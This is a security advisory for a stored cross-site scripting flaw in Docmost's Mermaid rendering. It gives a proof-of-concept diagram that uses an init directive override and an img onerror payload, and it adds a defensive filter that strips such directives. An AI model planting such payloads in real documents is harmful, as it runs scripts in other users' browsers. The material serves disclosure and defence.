Severity: Medium | CVSS 5.4 | XSS | CVE-2026-23630

Published January 2026

Docmost Mermaid XSS via Unsanitized SVG Rendering

BugBunny.ai discovered a cross-site scripting vulnerability in Docmost where Mermaid diagram rendering allows HTML injection through directive overrides. Attackers can embed malicious scripts in Mermaid code blocks that execute for every user who views the page.


Summary

Impact: Stored XSS affecting all page viewers
Vector: Mermaid %%{init}%% directive bypass
Surface: Any Docmost page with Mermaid code blocks
Status: Fixed in latest Docmost version

Root Cause

Docmost renders Mermaid diagrams by calling mermaid.render() and directly injecting the returned SVG into the DOM using dangerouslySetInnerHTML. The Mermaid library supports configuration directives that can override security settings, including securityLevel: "loose" which enables HTML in labels.

Proof of Concept

// Vulnerable rendering logic in Docmost
// apps/client/src/features/editor/components/code-block/mermaid-view.tsx (~28-56)

mermaid
  .render(id, node.textContent)     // attacker-controlled diagram
  .then((item) => {
    setPreview(item.svg);           // raw HTML/SVG returned - NO SANITIZATION
  });

// Later in JSX:
<div
  className={classes.mermaid}
  contentEditable={false}
  dangerouslySetInnerHTML={{ __html: preview }}  // Direct injection!
></div>

// PoC: Insert this Mermaid code block into any Docmost page:
```mermaid
%%{init: { "securityLevel": "loose", "htmlLabels": true }}%%
graph TD;
  X["<img src=x onerror=alert(document.domain)>"];
```

// Result: XSS executes for EVERY user who views the page
// The %%{init}%% directive overrides Mermaid's security settings:
// - securityLevel: "loose" disables HTML escaping
// - htmlLabels: true allows HTML in node labels

Mitigation

  • Update to the latest version of Docmost
  • The fix sanitizes Mermaid output or blocks dangerous directives
  • Consider using a Content Security Policy to mitigate XSS impact
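As an added defence-in-depth example (not Docmost's code or its actual fix), the filter below strips `%%{init}%%` directives from untrusted diagram source before it is handed to `mermaid.render()` as in the snippet above, and records whether a stripped directive tried to set a security-relevant key so the attempt can be logged. It assumes the render path also calls `mermaid.initialize({ securityLevel: "strict" })` and sanitizes the returned SVG (for example with DOMPurify) before `dangerouslySetInnerHTML`; the sample diagram and the key list are constructed for illustration.

```javascript
// Added example, not Docmost's code: pre-filter untrusted Mermaid source.
// Mermaid's strict securityLevel and sanitizing the rendered SVG remain the
// primary controls; this removes the directive-override vector up front and
// produces an audit record for detection.

// Configuration keys an untrusted page author must never be able to change
// (constructed list for this example).
const SECURITY_KEYS = ["securityLevel", "htmlLabels", "secure"];

// Mermaid directives have the form %%{init: { ... }}%% and may span lines.
// A plain "%% comment" line does not match because it has no brace.
const DIRECTIVE_RE = /%%\{[\s\S]*?\}%%/g;

// Collect the config key names that appear in a directive body. Mermaid
// accepts relaxed JSON, so keys may be quoted ("securityLevel") or bare.
function directiveKeys(directive) {
  const keys = new Set();
  const keyRe = /["']?([A-Za-z_][A-Za-z0-9_]*)["']?\s*:/g;
  let m;
  while ((m = keyRe.exec(directive)) !== null) keys.add(m[1]);
  return [...keys];
}

// Remove every directive from the source. Returns the cleaned source plus an
// audit record: each stripped directive, the keys it named, and whether any
// of them is security-relevant (worth alerting on for stored content).
function stripInitDirectives(source) {
  const removed = [];
  const cleaned = source.replace(DIRECTIVE_RE, (directive) => {
    const keys = directiveKeys(directive);
    removed.push({
      directive,
      keys,
      securitySensitive: keys.some((k) => SECURITY_KEYS.includes(k)),
    });
    return "";
  });
  return { cleaned, removed };
}

// Constructed sample shaped like the advisory's PoC, with a harmless label.
const SAMPLE = [
  '%%{init: { "securityLevel": "loose", "htmlLabels": true }}%%',
  "graph TD;",
  '  X["label"];',
].join("\n");

const result = stripInitDirectives(SAMPLE);
console.log(result.cleaned.trim());            // diagram without the directive
console.log(JSON.stringify(result.removed));   // what was stripped, for logging
```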

Credits & Disclosure

Identified by BugBunny.ai and responsibly disclosed to the Docmost maintainers.

Reporter: BugBunny.ai
CVE: CVE-2026-23630